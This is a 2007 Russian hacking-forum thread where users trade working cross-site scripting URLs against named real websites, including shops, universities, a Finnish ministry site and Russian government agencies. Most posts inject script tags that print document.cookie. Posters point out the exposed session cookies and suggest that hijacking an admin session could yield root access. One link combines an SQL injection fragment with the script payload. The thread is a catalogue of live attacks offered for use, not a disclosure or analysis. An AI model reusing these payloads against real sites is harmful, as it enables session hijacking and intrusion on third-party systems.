1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

XSS

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. Constantine
    Constantine Guest
    Постим только xss
    Активные приветствуются!
    Запрещаеться копипастить баги из аналогичной темы на Antichat.ru - я все ровно замечу, можете поверить
    Xss в поиске не приветсвуються =\
     
    8 май 2007
  2. Хел
    Хел Новичок
    Симпатии:
    191
    Внесу свой вклад... )

    Код:
    http://www.streetchat.ru/cgi-bin/main.cgi?infoabout=%3Cscript%3Ealert()%3C/script%3E
    Добавлено через 1 час 13 минут
    Исчо одна...

    Код:
    http://www.linkfest.ru/search.php?misc=1000111'&query=%3Cscript%3Ealert(Document.cookie)%3C/script%3E
     
    Последнее редактирование модератором: 16 май 2007
    13 май 2007
    2 пользователям это понравилось.
  3. ZeroCold
    ZeroCold Новичок
    Симпатии:
    12
    Код:
    http://leidykla.ktu.lt/main.php?ID=64&StrukturaID=5&KatID="><script>alert('xssssssss')</script>
     
    Последнее редактирование модератором: 16 май 2007
    14 май 2007
    2 пользователям это понравилось.
  4. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://217.174.99.38/
    в формочке поиска введите чего нить и будет вам радость =)
     
    Последнее редактирование модератором: 16 май 2007
    15 май 2007
  5. ZeroCold
    ZeroCold Новичок
    Симпатии:
    12
    Код:
    http://www.barracudanetworks.com/ns/news_and_events/index.php?nid="><script>alert('Xaker.name')</script>
    Код:
    http://www.traumaprevention.com/index.php?nid="><script>alert('Xaker.name')</script>
     
    Последнее редактирование модератором: 16 май 2007
    16 май 2007
  6. wriwel
    wriwel «ёлки!» Продвинутый
    Симпатии:
    77
    XSS прямо в поиске на: _http://www.msu.ru/search.html
    Ссылка:
    Код:
    http://www.astronet.ru/db/msusearch/index.html?q=<script>alert('free-test')</script>&site=www.msu.ru&ps=20
    Еще:
    Код:
    http://www.mnogosearch.ru/
    Здесь есть ссылка - "Зайти как пользователь"... XSS в поле Name...
     
    Последнее редактирование модератором: 16 май 2007
    16 май 2007
  7. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://www.russianculture.ru/search.asp?SearchMode=True&SearchStr=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&SearchB=True&SearchP=True
    PS

    _http://www.schwalbe.ru/page_finder.php

    вводите в формочку запрос и будет ксс)
     
    Последнее редактирование: 16 май 2007
    16 май 2007
  8. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://chat.narod.yandex.ru/chat/chat.xhtml?userid=5925651389148197147&chatid=237&template=1&ChatTitle=Xaker.Name
    очочоч слабая ксс. можно вывести любой тайтл)

    Добавлено через 21 час 45 минут
    Код:
    _http://www.interlinks.ru/search.php?keyword=%3Cscript%3Ealert(document.cookie)%3C/script%3E&x=4&y=10
    КСС выводит сессию в куках. А если перехватить сессию админа то можно получить рута)

    PS

    Код:
    _http://www.viam.spb.ru/equipment.php?s=%3Cscript%3Ealert()%3C/script%3E
    передаются данные методом пост, так што я вывел параметр по типа гет) в куках какая то хрень...

    Добавлено через 22 часа 24 минуты
    отличная ксска+) :

    Код:
    _http://www.bolero.ru/index.php?level=5&stype=quick&topic=0&cur_topic=0&cur_fquery=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sclass=all&cat=0&fquery=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cat=0&x=0&y=0
    Код:
    _http://www.moscowbooks.ru/search.asp?searchtext=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    PS
    чета мну седня на книжные сайты поперло =)

    Добавлено через 22 часа 51 минуту
    Код:
    _http://shit.ru/search.html?string=%3Cscript%3Ealert(document.cookie)%3C/script%3E&.x=32&.y=3
    еще ксс на говно.ру +)
     
    Последнее редактирование: 20 май 2007
    19 май 2007
    1 человеку нравится это.
  9. Constantine
    Constantine Guest
    То что ты нашел на Народе, xss ом не являеться
     
    24 май 2007
  10. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://searchportal.information.com/?query=%3Cscript%3Ealert()%3C/script%3E
     
    25 май 2007
  11. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://www.mediaatlas.ru/search/index.php?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    опять сессия... опять метод передачи post

    Добавлено через 22 минуты
    Код:
    _http://www.chat.ren-tv.com/cgi/newchat.exe?Get=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    уязвимость в чате рен-тв канала) оч популярный канал. там еще и инклуд вроде...
     
    Последнее редактирование: 30 май 2007
    30 май 2007
    1 человеку нравится это.
  12. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://xaker.ru/addr/folder.phtml?u=466989e98ab41&msg=&i=n.%3Cscript%3Ealert()%3C/script%3E..1&v=0
    серви почты nextmail вроде. седня обнаружил
    регим ящик и заходим в поиск юзверя. по ссылке аналогично проводим
     
    8 июн 2007
    1 человеку нравится это.
  13. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    _http://www.minedu.fi/OPM/Tarkennettu_haku/Tarkennettu_haku?lang=fi
    метод передачи пост, много хайден параметров, разобраться я так и не смог. Вводим в поиск <script>alert(document.cookie)</script> и видим свой идентификатор сессии. Сайт Министра Образования или как-там-еще

    Добавлено через 13 минут
    Код:
    _http://mabuka.ru/index.php?cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    это просто ксс

    Добавлено через 17 минут
    Код:
    _http://mabuka.ru/index.php?words=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&where=1&go=%C2%EF%E5%F0%E5%E4%21
    поиск тоже кссный

    Добавлено через 1 час 6 минут
    Код:
    _http://www.mladenec-shop.ru/search?sword=%3Cscript%3Ealert(document.cookie)%3C/script%3E&x=0&y=0
    сессия. чуствую себя педофилом=(

    Добавлено через 1 час 23 минуты
    Код:
    _http://www.tikki.ru/search.php?find=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    очередной педофилический сатй+сессия в пост-параметре

    Добавлено через 2 часа 12 минут
    Код:
    _http://www.ezhiki-karapuziki.ru/FrontSearch?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Добавлено через 3 часа 16 минут
    Код:
    _http://www.aptekaonline.ru/search.php?text=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0
     
    Последнее редактирование: 10 июн 2007
    10 июн 2007
  14. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://info-build.com.ua/service/bc/index.php?metod=l&ID=2262'&fn=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    сессия-единственное че интересно

    Добавлено через 23 часа 20 минут
    Код:
    http://www.laredoute.ru/showmaincategory.asp?maincategory=HOMME&subcat=%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    Последнее редактирование: 24 июн 2007
    23 июн 2007
  15. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://www.adidas-online.ru/catalog.php?catalog=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    адидасовкая ксс с сессией
     
    28 июн 2007
  16. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://www.fasi.gov.ru/subscribe/?action=subscribe&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E&x=5&y=6
    куки сесии на Федеральном агентстве по науке и инновациям
     
    7 июл 2007
  17. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://www.catholic.org/saints/stindex.php?lst=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    очень ржачно!))))) сеня день прям ржания)) зацените объем кукисов...))))
     
    8 июл 2007
    1 человеку нравится это.
  18. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://lavka.ru/lost_pass.php?mail=<script>alert(document.cookie)</script>
    ксс (метод post, сессия в куках, все стандартно).

    Добавлено через 22 часа 47 минут
    Код:
    http://library.bsu.edu.ru/Marcweb/newbook.asp?ValueDB=MarcBSU&DisplayDB=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    опять ксс с сессией и опять на сайте с доменом .еду) тише едешь дальше будешь-я думал на сайтах с расширением .edu, .gov && etc не будет даже ксс не говоря уж о скуле)

    Добавлено через 23 часа 13 минут
    Код:
    http://www.shop52.ru/rubricator.php?w=%3Cscript%3Ealert(document.cookie)%3C/script%3E
    php session

    Добавлено через 23 часа 49 минут
    Код:
    http://www.radiopopsa.ru/search.php?w=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
    радио попса. песдатая ксска
     
    Последнее редактирование: 10 июл 2007
    9 июл 2007
  19. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://www.vrn.net/Search?what=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&where=%E3%E4%E5
    only 4 voronezh citizens
     
    18 июл 2007
  20. Хел
    Хел Новичок
    Симпатии:
    191
    Код:
    http://www.rosprom.gov.ru/dates.php?month=7&idate=-1+select+%3Cscript%3Ealert(document.cookie)%3C/script%3E/*
    сложная скульная кука
     
    21 июл 2007
    1 человеку нравится это.

Поделиться этой страницей

Загрузка...